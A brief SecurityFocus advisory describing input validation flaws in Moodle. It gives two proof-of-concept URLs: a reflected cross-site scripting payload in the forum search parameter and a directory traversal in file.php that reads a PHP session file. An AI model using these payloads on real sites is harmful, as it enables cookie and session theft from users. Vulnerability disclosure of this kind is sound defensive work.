Moodle Multiple Input Validation Vulnerabilities

No exploit is required to leverage either of these issues. The following proof of concepts have been released.

http://www.example.com/moodle/mod/forum/view.php?id=1&search=moodle%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/moodle/file.php?file=/1/../sessions/sess_6ac3b47ee23c6aa55896f4cd68af9622


 

Privacy Statement
Copyright 2010, SecurityFocus